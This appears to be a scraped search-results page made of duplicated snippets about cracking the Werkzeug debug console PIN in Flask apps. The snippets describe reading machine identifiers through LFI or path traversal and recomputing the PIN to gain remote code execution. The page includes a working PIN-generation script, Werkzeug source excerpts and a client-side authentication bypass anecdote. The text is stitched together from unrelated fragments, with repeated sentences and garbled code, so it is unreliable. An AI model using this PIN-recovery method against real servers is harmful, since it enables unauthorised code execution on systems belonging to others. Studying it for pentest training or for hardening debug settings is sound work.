Werkzeug has a debug console that requires a pin by default. It's possible to bypass this with an LFI vulnerability or use it as a local privilege escalation vector.

As explained by Carlos Polop in Hacktricks.xyz, this exploit is to access /console from Werkzeug when it requires a pin.

Werkzeug has a debug console that requires a pin. It's possible to bypass this with an LFI vulnerability or use it as a local privilege escalation vector. - wdahlenburg/werkzeug-debug-console-b...

Werkzeug has a debug console that requires a pin. It's possible to bypass this with an LFI vulnerability or use it as a local privilege escalation vector. - wdahlenburg/werkzeug-debug-console-b...

January 10, 2020 - They are unlikely to be contained anywhere # within the unauthenticated debug page. private_bits = [ str(uuid.getnode()), get_machine_id(), ] h = hashlib.md5() for bit in chain(probably_public_bits, private_bits): if not bit: continue if isinstance(bit, text_type): bit = bit.encode('utf-8') h.update(bit) h.update(b'cookiesalt') cookie_name = '__wzd' + h.hexdigest()[:20] # If we need to generate a pin we salt it a bit more so that we don't # end up with the same value and generate out 9 digits if num is None: h.update(b'pinsalt') num = (' d' % int(h.hexdigest(), 16))[:9] # Format the pincode in groups of digits for easier remembering if # we don't have a result yet.

You can show them by setting this parameter to True. pin_security (bool) – can be used to disable the pin based security system. pin_logging (bool) – enables the logging of the pin system. ... Changed in version 2.2: Added the werkzeug.debug.preserve_context environ key.

September 30, 2021 - You can reverse the algorithm generating the console PIN. Inspect Werkzeug’s debug __init__.py file on server e.g. python3.5/site-packages/werkzeug/debug/__init__.py.

The suggestion is made to exploit the console PIN by analyzing the PIN generation algorithm in Werkzeug’s debug initialization file (__init__.py).

March 11, 2023 - Learn how to crack the Werkzeug Debugger pin and gain access to the console in Python-based Flask web applications with this educational blog post.

January 31, 2026 - I opened my proxy tool (Burp Suite), typed a random 4-digit PIN (1234), and hit submit. I intercepted the response from the server. The server responded with a JSON object: {"authenticated": false} This was the “aha!” moment. I noticed that the webpage didn’t refresh; it stayed on the same page and just displayed an error. This suggested that the client-side JavaScript was the one making the decision to show or hide the console based on that JSON value.

April 10, 2023 - Second, check if the secret key used to sign session cookies is visible anywhere in the source code. Finally, check whether debugging has been enabled in Werkzeug when the application was started. If debugging is enabled, attempt to crack the PIN to access the debugging console and execute ...

import hashlib from itertools import chain import os import getpass pin = None rv = None num = None probably_public_bits = [ 'h4ckua11' , # username 'flask.app' , # modname 'Flask', '/usr/local/lib/python2.7/dist-packages/flask/app.py' ] private_bits = [ '191101483950643' , 'my serial number' ] h = hashlib.md5() # Bit is going through every thing in probably_public_bits and private_bits for bit in chain(probably_public_bits, private_bits): if not bit: continue if isinstance(bit, unicode): bit = bit.encode("utf-8") h.update(bit) h.update(b"cookiesalt") if num is None : h.update(b"pinsalt") num = (" d" % int(h.hexdigest(), 16))[:9] if rv is None : for group_size in 5 , 4 , 3 : if len (num)% group_size == 0 : rv = '-' .join (num [x: x + group_size] .rjust (group_size, '0' ) for x in range ( 0 , len (num), group_size)) break else : rv = num print (rv)

November 10, 2024 - The suggestion is made to exploit the console PIN by analyzing the PIN generation algorithm in Werkzeug’s debug initialization file (__init__.py).

_machine_id = rv = _generate() return rv ``` It searched different files on different operating systems. On Mac in my case it looked up the Serial Number. On linux it just read _/etc/machine-id_. Now I had everything to run the code. I ran it and I got the same pin number as the I had earlier.

Werkzeug has a debug console that requires a pin by default. It's possible to bypass this with an LFI vulnerability or use it as a local privilege escalation vector.

Werkzeug has a debug console that requires a pin by default. It's possible to bypass this with an LFI vulnerability or use it as a local privilege escalation vector.

By exploiting the path traversal vulnerability and gathering system information, we successfully generate the debug pin required to access the Werkzeug debugger console remotely.

1. Remote Code Execution (RCE) Via Werkzeug Debug Console & Bypassing Console PIN Code, Path Traversal Filter

Generates all possible PIN combinations! Contribute to StillNoob/Werkzeug-Console-PIN-Cracker development by creating an account on GitHub.